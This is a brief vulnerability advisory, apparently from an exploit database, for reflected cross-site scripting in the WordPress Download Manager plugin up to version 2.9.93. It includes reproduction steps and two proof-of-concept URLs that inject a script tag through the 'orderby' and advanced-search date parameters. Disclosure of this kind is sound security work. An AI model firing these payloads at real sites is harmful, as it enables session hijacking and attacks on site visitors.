Download Manager <= 2.9.93 - Authenticated Cross-Site Scripting (XSS)

In the pro features of the WordPress download manager plugin, there is a Category Short-code feature witch can use to sort categories with order by a function which will be used as ?orderby=title,publish_date . By adding parameter “> and add any XSS payload , the xss payload will execute. To reproduce, 1. Go to the link where we can find ?orderby 2. Add parameters >” and give simple payload like 3. The payload will execute. Another reflected cross-site scripting via advance search .

PoC

https://demo.wpdownloadmanager.com/wpdmpro/list-packages/?orderby=title"><script>alert(1)</script>&amp;order;=asc https://demo.wpdownloadmanager.com/wpdmpro/advanced-search/?search[publish_date]=2019-04-17+to+2019-04-17"><script>alert(1)</script>&amp;search;[update_date]=&amp;search;[view_count]=&amp;search;[download_count]=&amp;search;[package_size]=&amp;search;[order_by]=&amp;search;[order]=ASC&amp;q;=a